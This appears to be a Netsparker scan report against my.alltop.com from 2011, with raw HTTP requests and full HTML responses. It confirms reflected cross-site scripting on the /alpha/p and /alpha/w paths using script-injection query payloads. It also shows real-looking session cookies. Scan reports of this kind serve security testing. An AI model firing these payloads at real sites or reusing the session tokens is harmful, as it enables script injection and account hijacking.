Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:54 GMT; path=/; domain=.alltop.com,myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com,alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:55 GMT; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:55 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24498


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>MyAlltop - alpha</title> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <meta name="description" content="Alltop presents all the top stories from alpha websites. Think of Alltop as an online magazine rack." /> <meta name="keywords" content="" /> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <link rel="apple-touch-icon" href="/apple-touch-icon.png" /> <link rel="alternate" type="application/rss+xml" href="http://my.alltop.com/alpha/rss" /> <meta name="author" content="electricpulp.com" /> <meta name="robots" content="noindex, nofollow" /> <link rel="stylesheet" href="/css/style.css" type="text/css" media="screen" charset="utf-8" /> <link rel="stylesheet" href="/css/iphone.css" type="text/css" media="only screen and (max-device-width: 480px)" /> <link rel="stylesheet" href="/css/ipad.css" type="text/css" media="only screen and (max-device-width: 1024px)" /> <!--[if IE 6]> <link rel="stylesheet" href="/css/ie_style.css" type="text/css" media="screen" charset="utf-8" /><![endif]--> <!-- Behaviors --> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/mootools/1.11/mootools-yui-compressed.js" charset="utf-8"></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop-clean.js" charset="utf-8"></script> <script type="text/javascript" charset="utf-8"><!--// <![CDATA[ var resultsSlider; var load_method = (window.ie ? 'load' : 'domready'); window.addEvent(load_method, function(){ resultsSlider = new Fx.Slide('results', {duration: 500}); resultsSlider.hide(); }); var skip_nav = true; // ]]> --></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop.js" charset="utf-8"></script> <style type="text/css"> .add-feed { display:none; } </style> <!-- Analytics --> <script type="text/javascript"> window.google_analytics_uacct = "UA-1701157-4"; </script> <!-- Ads --> <script type='text/javascript'><!--// <![CDATA[ var OA_source = 'test'; var OA_zones = { 'leaderboard' : 70, 'slot_3_1' : 2, 'slot_3_2' : 3, 'slot_3_300_250' : 66, 'slot_9_300_250' : 69, 'slot_6_1' : 59, 'slot_6_2' : 60, 'slot_9_1' : 57, 'slot_9_2' : 58, 'slot_3' : 24, 'slot_6' : 4, 'slot_9' : 49 } // ]]> --></script> <script type='text/javascript' src='http://at-adserver.alltop.com/openx/www/delivery/spcjs.php?id=1&amp;target=_blank'></script> <!-- Typography --> <script type="text/javascript" src="/scripts/sifr/sifr.js"></script> <script type="text/javascript" src="/scripts/sifr/sifr-config.js"></script></head><body><script type='text/javascript'><!--// <![CDATA[OA_show('top_script');// ]]> --></script> <div id="opener"> <a href="http://alltop.com/" id="logo">Alltop</a> <div id="leaderboard"> <script type='text/javascript'><!--// <![CDATA[ OA_show('leaderboard'); // ]]> --></script> </div></div> <div id="wrap-discover"> <div id="discover" class="clearfix"> <div id="discover-by-cat"> <ul id="categories"> <li><a href="/topic/work" rel="1">Work</a></li><li><a href="/topic/health" rel="2">Health</a></li><li><a href="/topic/culture" rel="3">Culture</a></li><li><a href="/topic/interests" rel="4">Interests</a></li><li><a href="/topic/tech" rel="5">Tech</a></li><li><a href="/topic/people" rel="6">People</a></li><li><a href="/topic/good" rel="7">Good</a></li><li><a href="/topic/news" rel="8">News</a></li><li><a href="/topic/geos" rel="9">Geos</a></li><li><a href="/topic/sports" rel="10">Sports</a></li> </ul> </div> <div id="discover-alpha"> <ul id="alpha"> <li><a href="/alpha/a" rel="A">A</a></li><li><a href="/alpha/b" rel="B">B</a></li><li><a href="/alpha/c" rel="C">C</a></li><li><a href="/alpha/d" rel="D">D</a></li><li><a href="/alpha/e" rel="E">E</a></li><li><a href="/alpha/f" rel="F">F</a></li><li><a href="/alpha/g" rel="G">G</a></li><li><a href="/alpha/h" rel="H">H</a></li><li><a href="/alpha/i" rel="I">I</a></li><li><a href="/alpha/j" rel="J">J</a></li><li><a href="/alpha/k" rel="K">K</a></li><li><a href="/alpha/l" rel="L">L</a></li><li><a href="/alpha/m" rel="M">M</a></li><li><a href="/alpha/n" rel="N">N</a></li><li><a href="/alpha/o" rel="O">O</a></li><li><a href="/alpha/p" rel="P">P</a></li><li><a href="/alpha/q" rel="Q">Q</a></li><li><a href="/alpha/r" rel="R">R</a></li><li><a href="/alpha/s" rel="S">S</a></li><li><a href="/alpha/t" rel="T">T</a></li><li><a href="/alpha/u" rel="U">U</a></li><li><a href="/alpha/v" rel="V">V</a></li><li><a href="/alpha/w" rel="W">W</a></li><li><a href="/alpha/x" rel="X">X</a></li><li><a href="/alpha/y" rel="Y">Y</a></li><li><a href="/alpha/z" rel="Z">Z</a></li><li><a href="/alpha/#" rel="#">#</a></li> </ul> </div> </div> </div> <div id="wrap-search"> <div id="search" class="clearfix"> <ul id="navigation" class="tabs"> <li><a href="http://alltop.com/" class="hot-topics">Hot Topics</a></li> <li><a href="http://alltop.com/?new_topics=true" class="new-topics">New Topics</a></li> <li><a href="http://alltop.com/?recent_topics=true" class="my-recent-topics">My Recent Topics</a></li> <li class="here"><a href="http://my.alltop.com/" class="myalltop">MyAlltop</a></li> <li><a href="http://holykaw.alltop.com/" class="holykaw">HolyKaw</a></li> </ul> <div id="search-box"> <form action="/" method="get" id="search-form"> <input type="text" name="keywords" value="" id="key-words" /> <input type="image" src="/img/search-bttn.gif" id="bttn-search" /> </form> </div> </div> </div> <div id="wrap-results"> <div id="slide-results"> <div id="results" class="clearfix" style="visibility:hidden;"> </div> </div></div><div id="headlines" class="hfeed clearfix"> <h1 id="pagetitle" class="din"> Selected by alpha </h1> <ul id="top-five" class="feed-block"> <li class="site"> <h2>Most Topular Stories</h2> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://holykaw.alltop.com/kirkus-calls-guy-a-modern-day-dale-carnegie" rel="bookmark" target="_blank">Kirkus calls Guy a “modern-day Dale Carnegie”</a></h3> <div class="full-post"> <div class="site-title">Holy Kaw!</div> <div class="published">8 Mar 2011 | 7:31 am</div> <div class="entry-content"> <div class="entry-bound">The publishing industry considers Kirkus one of the toughest reviewers. You&rsquo;ll seldom see a really positive one from the organization, so it was a big deal to get this review: Apple&rsquo;s former chief evangelist leads businessfolk down the path to enchantment. The entrepreneur&rsquo;s entrepreneur is back with his ninth book, this time tackling the tricky art of influence and persuasion. Kawasaki (Reality Check: The Irreverent Guide to Outsmarting, Outmanaging and Outmarketing Your Competition, 2011, etc.) transforms the otherwise exhausted and overwrought tropes of how to win friends&hellip;</div> </div> </div> </li> </ul> <ul id="feed832131" class="feed-block 451b505be509cf8fb081d3e256f160a6"> <li class="site"><div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div><h2><a href="http://holykaw.alltop.com" target="_blank" class="snap_shots">Holy Kaw!</a></h2></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/kirkus-calls-guy-a-modern-day-dale-carnegie" rel="bookmark" target="_blank">Kirkus calls Guy a “modern-day Dale Carnegie”</a></h3><div class="full-post"><div class="published">8 Mar 2011 | 7:31 am</div><div class="entry-content"><div class="entry-bound">The publishing industry considers Kirkus one of the toughest reviewers. You&rsquo;ll seldom see a really positive one from the organization, so it was a big deal to get this review: Apple&rsquo;s former chief evangelist leads businessfolk down the path to enchantment. The entrepreneur&rsquo;s entrepreneur is back with his ninth book, this time tackling the tricky art of influence and persuasion. Kawasaki (Reality Check: The Irreverent Guide to Outsmarting, Outmanaging and Outmarketing Your Competition, 2011, etc.) transforms the otherwise exhausted and overwrought tropes of how to win friends&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/how-great-are-you-take-the-quiz" rel="bookmark" target="_blank">How GREAT are you? Take the quiz.</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 10:24 pm</div><div class="entry-content"><div class="entry-bound">How many books offer a quiz to help potential readers determine if they should trot down to the bookstore (or e-reader) and pick it up? Yeah, this isn&rsquo;t your average book following the same old rules. Enchantment: The Art of Changing Hearts, Minds, and Actions explores how to successfully exert influence without looking like an idiot or compromising ethical standards. So while you might think of yourself as the most enchanting feller on the block, the &ldquo;How GREAT are you?&rdquo; quiz will offer a definitive answer. The greatness score will determine how enchanting you are (and how&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/thanks-merci-mahalo-to-the-enchantment-team-v" rel="bookmark" target="_blank">Thanks, Merci, Mahalo to the Enchantment Team (video)</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 7:00 pm</div><div class="entry-content"><div class="entry-bound">If you think that creating a book is a solitary activity involving windswept beaches and fountain pens, you&rsquo;re hallucinating. Writing is a difficult and painful process. It also takes many people to complete the process of finishing a book: editors (content and copy), publicists, designers, assistants, production people, artists, photographers, beta testers, programmers, website designers, and origamists. By my count, close to one hundred people helped me write, finish, and market this book. My friends, Brad Jefferson and Andrew Jacobson, at Animoto created this awesome video so that&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/like-the-enchantment-fan-page-for-exclusive-g" rel="bookmark" target="_blank">Like the Enchantment Fan page for exclusive goodies</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 6:14 pm</div><div class="entry-content"><div class="entry-bound">A wise sage once said: Eat like a bird, poop like an elephant, and enchant like Guy Kawasaki. Now that Guy's new book Enchantment hits shelves March 8, keep up with quick tips, instructive videos, and funny stories from the author on the Enchantment Facebook fan page.&nbsp; In addition to the inside track on the art of Enchantment, like the fan page and find: A free download of Guy's first book, The Macintosh Way. Guy's Realistic Enchantment Aptitude Test. A photo context with prizes that include and iPad and five Nikon D3100s. Embeddable videos. &nbsp; Interesting stories, funny pictures,&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/introducing-the-enchantment-badges-and-wallpa" rel="bookmark" target="_blank">Introducing the Enchantment badges and wallpapers</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 5:45 pm</div><div class="entry-content"><div class="entry-bound">Here&rsquo;s an easy way to bring a smile to Guy&rsquo;s face: Slap one of these new Enchantment badges onto your blog or personal website, and let the world know that you&rsquo;re out to get it. Or do a little spring cleaning and set one of the elegant Enchantment wallpapers as your desktop&mdash;a reminder that everyday is for the enchanting. Watch out, universe: Resistance is futile. Enchanters, let's hear you roar. Get your badges and wallpaper today. (Did you setup your badge or desktop?&nbsp;Share it on the Enchantment Facebook fan page.) Please click here to buy Enchantment now.</div></div></div></li></ul></div><div id="footer" class="clearfix"> <p class="copyright">&copy; 2011 Nononina, Inc. All Rights Reserved</p> <p class="navigation"> <a href="http://alltop.com/about/">About</a> &middot; <a href="http://alltop.com/advertising/">Advertising</a> &middot; <a href="http://alltop.com/submission/">Submissions</a> &middot; <a href="http://alltop.com/contact-us/">Contact Us</a> &middot; <a href="http://blog.alltop.com/">Blog</a> &middot; <a href="http://alltop.com/goodies/">Goodies</a> &middot; <a href="http://alltop.com/legal/" rel="nofollow">Legal</a> </p> <p class="site-credits">Powered by <a href="http://rackspace.com">a Rackspace Dedicated Server</a> &middot; Inspired by <a href="http://popurls.com">popurls</a> &middot; Site by <a href="http://electricpulp.com" rel="cool">Electric Pulp</a> </p></div><script type="text/javascript" charset="utf-8">

function signup_form_submit() {
var f = $('the-signup-form');
f.ajax.value=1;
new Ajax(f.action, {
method: 'post',
data: $('the-signup-form'),
onRequest: function(){
},
onComplete: function(response){
if (response==0) {
$('sign-up-form-html').effect('opacity', {
duration: 500,
fps: 75,
onComplete: function(){
..
- /alpha/p

/alpha/p CONFIRMED

http://my.alltop.com/alpha/p?'"--></style></script><script>alert(0x000208)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x000208)</script>

Request

GET /alpha/p?'"--></style></script><script>netsparker(0x000208)</script> HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:06 GMT; path=/; domain=.alltop.com,myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com,alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:06 GMT; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:06 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24498


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>MyAlltop - alpha</title> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <meta name="description" content="Alltop presents all the top stories from alpha websites. Think of Alltop as an online magazine rack." /> <meta name="keywords" content="" /> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <link rel="apple-touch-icon" href="/apple-touch-icon.png" /> <link rel="alternate" type="application/rss+xml" href="http://my.alltop.com/alpha/rss" /> <meta name="author" content="electricpulp.com" /> <meta name="robots" content="noindex, nofollow" /> <link rel="stylesheet" href="/css/style.css" type="text/css" media="screen" charset="utf-8" /> <link rel="stylesheet" href="/css/iphone.css" type="text/css" media="only screen and (max-device-width: 480px)" /> <link rel="stylesheet" href="/css/ipad.css" type="text/css" media="only screen and (max-device-width: 1024px)" /> <!--[if IE 6]> <link rel="stylesheet" href="/css/ie_style.css" type="text/css" media="screen" charset="utf-8" /><![endif]--> <!-- Behaviors --> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/mootools/1.11/mootools-yui-compressed.js" charset="utf-8"></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop-clean.js" charset="utf-8"></script> <script type="text/javascript" charset="utf-8"><!--// <![CDATA[ var resultsSlider; var load_method = (window.ie ? 'load' : 'domready'); window.addEvent(load_method, function(){ resultsSlider = new Fx.Slide('results', {duration: 500}); resultsSlider.hide(); }); var skip_nav = true; // ]]> --></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop.js" charset="utf-8"></script> <style type="text/css"> .add-feed { display:none; } </style> <!-- Analytics --> <script type="text/javascript"> window.google_analytics_uacct = "UA-1701157-4"; </script> <!-- Ads --> <script type='text/javascript'><!--// <![CDATA[ var OA_source = 'test'; var OA_zones = { 'leaderboard' : 70, 'slot_3_1' : 2, 'slot_3_2' : 3, 'slot_3_300_250' : 66, 'slot_9_300_250' : 69, 'slot_6_1' : 59, 'slot_6_2' : 60, 'slot_9_1' : 57, 'slot_9_2' : 58, 'slot_3' : 24, 'slot_6' : 4, 'slot_9' : 49 } // ]]> --></script> <script type='text/javascript' src='http://at-adserver.alltop.com/openx/www/delivery/spcjs.php?id=1&amp;target=_blank'></script> <!-- Typography --> <script type="text/javascript" src="/scripts/sifr/sifr.js"></script> <script type="text/javascript" src="/scripts/sifr/sifr-config.js"></script></head><body><script type='text/javascript'><!--// <![CDATA[OA_show('top_script');// ]]> --></script> <div id="opener"> <a href="http://alltop.com/" id="logo">Alltop</a> <div id="leaderboard"> <script type='text/javascript'><!--// <![CDATA[ OA_show('leaderboard'); // ]]> --></script> </div></div> <div id="wrap-discover"> <div id="discover" class="clearfix"> <div id="discover-by-cat"> <ul id="categories"> <li><a href="/topic/work" rel="1">Work</a></li><li><a href="/topic/health" rel="2">Health</a></li><li><a href="/topic/culture" rel="3">Culture</a></li><li><a href="/topic/interests" rel="4">Interests</a></li><li><a href="/topic/tech" rel="5">Tech</a></li><li><a href="/topic/people" rel="6">People</a></li><li><a href="/topic/good" rel="7">Good</a></li><li><a href="/topic/news" rel="8">News</a></li><li><a href="/topic/geos" rel="9">Geos</a></li><li><a href="/topic/sports" rel="10">Sports</a></li> </ul> </div> <div id="discover-alpha"> <ul id="alpha"> <li><a href="/alpha/a" rel="A">A</a></li><li><a href="/alpha/b" rel="B">B</a></li><li><a href="/alpha/c" rel="C">C</a></li><li><a href="/alpha/d" rel="D">D</a></li><li><a href="/alpha/e" rel="E">E</a></li><li><a href="/alpha/f" rel="F">F</a></li><li><a href="/alpha/g" rel="G">G</a></li><li><a href="/alpha/h" rel="H">H</a></li><li><a href="/alpha/i" rel="I">I</a></li><li><a href="/alpha/j" rel="J">J</a></li><li><a href="/alpha/k" rel="K">K</a></li><li><a href="/alpha/l" rel="L">L</a></li><li><a href="/alpha/m" rel="M">M</a></li><li><a href="/alpha/n" rel="N">N</a></li><li><a href="/alpha/o" rel="O">O</a></li><li><a href="/alpha/p" rel="P">P</a></li><li><a href="/alpha/q" rel="Q">Q</a></li><li><a href="/alpha/r" rel="R">R</a></li><li><a href="/alpha/s" rel="S">S</a></li><li><a href="/alpha/t" rel="T">T</a></li><li><a href="/alpha/u" rel="U">U</a></li><li><a href="/alpha/v" rel="V">V</a></li><li><a href="/alpha/w" rel="W">W</a></li><li><a href="/alpha/x" rel="X">X</a></li><li><a href="/alpha/y" rel="Y">Y</a></li><li><a href="/alpha/z" rel="Z">Z</a></li><li><a href="/alpha/#" rel="#">#</a></li> </ul> </div> </div> </div> <div id="wrap-search"> <div id="search" class="clearfix"> <ul id="navigation" class="tabs"> <li><a href="http://alltop.com/" class="hot-topics">Hot Topics</a></li> <li><a href="http://alltop.com/?new_topics=true" class="new-topics">New Topics</a></li> <li><a href="http://alltop.com/?recent_topics=true" class="my-recent-topics">My Recent Topics</a></li> <li class="here"><a href="http://my.alltop.com/" class="myalltop">MyAlltop</a></li> <li><a href="http://holykaw.alltop.com/" class="holykaw">HolyKaw</a></li> </ul> <div id="search-box"> <form action="/" method="get" id="search-form"> <input type="text" name="keywords" value="" id="key-words" /> <input type="image" src="/img/search-bttn.gif" id="bttn-search" /> </form> </div> </div> </div> <div id="wrap-results"> <div id="slide-results"> <div id="results" class="clearfix" style="visibility:hidden;"> </div> </div></div><div id="headlines" class="hfeed clearfix"> <h1 id="pagetitle" class="din"> Selected by alpha </h1> <ul id="top-five" class="feed-block"> <li class="site"> <h2>Most Topular Stories</h2> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://holykaw.alltop.com/kirkus-calls-guy-a-modern-day-dale-carnegie" rel="bookmark" target="_blank">Kirkus calls Guy a “modern-day Dale Carnegie”</a></h3> <div class="full-post"> <div class="site-title">Holy Kaw!</div> <div class="published">8 Mar 2011 | 7:31 am</div> <div class="entry-content"> <div class="entry-bound">The publishing industry considers Kirkus one of the toughest reviewers. You&rsquo;ll seldom see a really positive one from the organization, so it was a big deal to get this review: Apple&rsquo;s former chief evangelist leads businessfolk down the path to enchantment. The entrepreneur&rsquo;s entrepreneur is back with his ninth book, this time tackling the tricky art of influence and persuasion. Kawasaki (Reality Check: The Irreverent Guide to Outsmarting, Outmanaging and Outmarketing Your Competition, 2011, etc.) transforms the otherwise exhausted and overwrought tropes of how to win friends&hellip;</div> </div> </div> </li> </ul> <ul id="feed832131" class="feed-block 451b505be509cf8fb081d3e256f160a6"> <li class="site"><div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div><h2><a href="http://holykaw.alltop.com" target="_blank" class="snap_shots">Holy Kaw!</a></h2></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/kirkus-calls-guy-a-modern-day-dale-carnegie" rel="bookmark" target="_blank">Kirkus calls Guy a “modern-day Dale Carnegie”</a></h3><div class="full-post"><div class="published">8 Mar 2011 | 7:31 am</div><div class="entry-content"><div class="entry-bound">The publishing industry considers Kirkus one of the toughest reviewers. You&rsquo;ll seldom see a really positive one from the organization, so it was a big deal to get this review: Apple&rsquo;s former chief evangelist leads businessfolk down the path to enchantment. The entrepreneur&rsquo;s entrepreneur is back with his ninth book, this time tackling the tricky art of influence and persuasion. Kawasaki (Reality Check: The Irreverent Guide to Outsmarting, Outmanaging and Outmarketing Your Competition, 2011, etc.) transforms the otherwise exhausted and overwrought tropes of how to win friends&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/how-great-are-you-take-the-quiz" rel="bookmark" target="_blank">How GREAT are you? Take the quiz.</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 10:24 pm</div><div class="entry-content"><div class="entry-bound">How many books offer a quiz to help potential readers determine if they should trot down to the bookstore (or e-reader) and pick it up? Yeah, this isn&rsquo;t your average book following the same old rules. Enchantment: The Art of Changing Hearts, Minds, and Actions explores how to successfully exert influence without looking like an idiot or compromising ethical standards. So while you might think of yourself as the most enchanting feller on the block, the &ldquo;How GREAT are you?&rdquo; quiz will offer a definitive answer. The greatness score will determine how enchanting you are (and how&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/thanks-merci-mahalo-to-the-enchantment-team-v" rel="bookmark" target="_blank">Thanks, Merci, Mahalo to the Enchantment Team (video)</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 7:00 pm</div><div class="entry-content"><div class="entry-bound">If you think that creating a book is a solitary activity involving windswept beaches and fountain pens, you&rsquo;re hallucinating. Writing is a difficult and painful process. It also takes many people to complete the process of finishing a book: editors (content and copy), publicists, designers, assistants, production people, artists, photographers, beta testers, programmers, website designers, and origamists. By my count, close to one hundred people helped me write, finish, and market this book. My friends, Brad Jefferson and Andrew Jacobson, at Animoto created this awesome video so that&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/like-the-enchantment-fan-page-for-exclusive-g" rel="bookmark" target="_blank">Like the Enchantment Fan page for exclusive goodies</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 6:14 pm</div><div class="entry-content"><div class="entry-bound">A wise sage once said: Eat like a bird, poop like an elephant, and enchant like Guy Kawasaki. Now that Guy's new book Enchantment hits shelves March 8, keep up with quick tips, instructive videos, and funny stories from the author on the Enchantment Facebook fan page.&nbsp; In addition to the inside track on the art of Enchantment, like the fan page and find: A free download of Guy's first book, The Macintosh Way. Guy's Realistic Enchantment Aptitude Test. A photo context with prizes that include and iPad and five Nikon D3100s. Embeddable videos. &nbsp; Interesting stories, funny pictures,&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/introducing-the-enchantment-badges-and-wallpa" rel="bookmark" target="_blank">Introducing the Enchantment badges and wallpapers</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 5:45 pm</div><div class="entry-content"><div class="entry-bound">Here&rsquo;s an easy way to bring a smile to Guy&rsquo;s face: Slap one of these new Enchantment badges onto your blog or personal website, and let the world know that you&rsquo;re out to get it. Or do a little spring cleaning and set one of the elegant Enchantment wallpapers as your desktop&mdash;a reminder that everyday is for the enchanting. Watch out, universe: Resistance is futile. Enchanters, let's hear you roar. Get your badges and wallpaper today. (Did you setup your badge or desktop?&nbsp;Share it on the Enchantment Facebook fan page.) Please click here to buy Enchantment now.</div></div></div></li></ul></div><div id="footer" class="clearfix"> <p class="copyright">&copy; 2011 Nononina, Inc. All Rights Reserved</p> <p class="navigation"> <a href="http://alltop.com/about/">About</a> &middot; <a href="http://alltop.com/advertising/">Advertising</a> &middot; <a href="http://alltop.com/submission/">Submissions</a> &middot; <a href="http://alltop.com/contact-us/">Contact Us</a> &middot; <a href="http://blog.alltop.com/">Blog</a> &middot; <a href="http://alltop.com/goodies/">Goodies</a> &middot; <a href="http://alltop.com/legal/" rel="nofollow">Legal</a> </p> <p class="site-credits">Powered by <a href="http://rackspace.com">a Rackspace Dedicated Server</a> &middot; Inspired by <a href="http://popurls.com">popurls</a> &middot; Site by <a href="http://electricpulp.com" rel="cool">Electric Pulp</a> </p></div><script type="text/javascript" charset="utf-8">

function signup_form_submit() {
var f = $('the-signup-form');
f.ajax.value=1;
new Ajax(f.action, {
method: 'post',
data: $('the-signup-form'),
onRequest: function(){
},
onComplete: function(response){
if (response==0) {
$('sign-up-form-html').effect('opacity', {
duration: 500,
fps: 75,
onComplete: functio..
- /alpha/w

/alpha/w CONFIRMED

http://my.alltop.com/alpha/w?'"--></style></script><script>alert(0x00020A)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00020A)</script>

Request

GET /alpha/w?'"--></style></script><script>netsparker(0x00020A)</script> HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
